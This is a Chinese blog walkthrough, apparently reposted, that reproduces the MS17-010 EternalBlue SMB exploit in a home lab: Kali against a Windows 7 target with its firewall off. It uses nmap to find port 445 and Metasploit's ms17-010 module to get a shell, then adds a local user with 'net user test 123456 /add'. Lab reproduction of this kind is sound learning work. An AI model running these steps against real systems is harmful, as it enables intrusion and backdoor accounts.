标签:kali 192.168 010 227.130 MS17 复现 永恒 靶机
1. 漏洞介绍
- 永恒之蓝:
恒之蓝是指2017年4月14日晚,黑客团体Shadow
Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
复现准备
- kali linux
- win7 靶机 (关闭防火墙)
注: 两台机器需在本地的同一个网段内 复现环境我的kali的地址为192.168.227.129 win7靶机为192.168.227.130
过程:
- 防止出问题 先利用kali机ping一下靶机
ping 192.168.227.130
直接nmap一把梭 扫描靶机
nmap 192.168.227.130
可以看到445端口是开放的,因为我们需要利用的就是445端口
- 启动msfconsole
然后搜索ms17-010
然后直接use 0 第一个
再用 show options 查看需要配置的参数
设置攻击ip
set rhosts 192.168.227.130
然后run
发现已经攻击成功 成功拿到的shell
但是乱码 网上赵了一下教程
chcp 65001
可解决乱码问题。
发现成功执行
net user test 123456 /add
来到win7靶机查看用户 (其实kali也可以 不过严谨一点)
永恒之蓝复现就到此结束。
标签:kali,192.168,010,227.130,MS17,复现,永恒,靶机 来源: https://www.cnblogs.com/snail7/p/16543390.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。